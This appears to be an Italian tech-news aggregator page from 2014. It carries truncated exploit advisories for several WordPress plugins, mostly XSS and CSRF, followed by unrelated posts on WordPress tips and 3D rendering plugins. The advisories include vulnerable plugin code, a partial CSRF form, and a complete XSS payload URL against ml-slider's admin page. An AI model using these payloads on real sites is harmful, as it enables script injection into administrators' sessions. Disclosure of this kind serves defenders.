WordPress Random Banner 1.1.2.1 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress random-banner.1.1.2.1 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/random-banner/
 
# Software Link :  
http://downloads.wordpress.org/plugin/random-banner.1.1.2.1.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<input placeholder="Link for that image"  type="text" size="25"  
name="buffercode_RBanner_url_banner1" value="<?php echo  
get_option('buffercode_RBanner_url_banner1') ?>" />
 
 
######################
 
Exploit...

Leggi il seguito »

WordPress Custom Banners 1.2.2.2 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress custom-banners 1.2.2.2 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/custom-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/custom-banners.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<table class="form-table">
  <tr valign="top">
    <th scope="row"><label for="custom_banners_registered_name">Email  
Address</label></th>
    <td><input type="text" name="custom_banners_registered_name"...

Leggi il seguito »

WordPress Bannerman 0.2.4 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/bannerman/
 
# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/options-general.php?page=bannerman
 
######################
 
Exploit Code:
 
<html>
<body>
<form name="post_form" action="http://localhost/wp-admin/options-general.php?page=bannerman" method="post">
<input type='hidden' name="bannerman_background"...

Leggi il seguito »

WordPress ml-slider 2.5 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress ml-slider 2.5 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/ml-slider
 
# Software Link : downloads.wordpress.org/plugin/ml-slider.2.5.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/admin.php?page=metaslider&id=1[xss]
 
 
# Exploit:  
http://localhost/wp-admin/admin.php?page=metaslider&id=1"/><script>alert(1);</script>
 
#####################
 
Discovered By : ACC3SS
 
#####################

(4)

...

Leggi il seguito »

WordPress Simple Share Buttons Adder 4.4 CSRF / XSS

1 luglio 2014 - Fonte: http://www.mondounix.com
Details
================
Software: Simple Share Buttons Adder
Version: 4.4
Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:P)
 
Description
================
CSRF and stored XSS in Simple Share Buttons Adder 4.4
 
Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
 
 
Proof of concept
================
If a logged-in administrator user clicks...

Leggi il seguito »

Ecommerce con WordPress: ecco 4 nuove soluzioni!

1 luglio 2014 - Fonte: http://blog.artera.it

Che con WordPress si possa fare ecommerce lo sanno anche le pietre. Quello che in pochi sanno è come fare ecommerce con WordPress. WooCommerce non è l'unica soluzione, ma esistono altri plugin facili da usare, gratuiti e molto diffusi.

Leggi tutto l'articolo Ecommerce con WordPress: ecco 4 nuove soluzioni! »

...

Leggi il seguito »

WordPress: aggiungere categorie e tag alle pagine

13 giugno 2014 - Fonte: http://technotes.altervista.org/blog

L’altro giorno, risistemando il mio sito dei racconti di viaggio ho inserito dei tag su alcuni post per facilitarne la ricerca. E fino qui niente di strano.
Poco dopo mi è venuta voglia di mettere i tag anche a delle pagine che avevo pubblicato e mi sono accorto che non era possibile …

Continua su http://technotes.marziocarro.com/2014/06/wordpress-aggiungere-categorie-tag-alle-pagine/

L'articolo WordPress: aggiungere categorie e tag alle pagine sembra essere il primo su ...

Leggi il seguito »

Pixar RenderMan Studio 19

12 giugno 2014 - Fonte: http://renderstudiotaranto.wordpress.com
In arrivo la versione 19 di uno dei piu famosi ed innovativi render engine. In questi video alcune nuove funzioni della versione 18....

Leggi il seguito »

Distruzione totale con Pulldownit 3

12 giugno 2014 - Fonte: http://renderstudiotaranto.wordpress.com
Plugin specifica per la distruzione di modelli. Disponibile per 3D Studio Max e Maya. Ecco le migliorie della versione 3...

Leggi il seguito »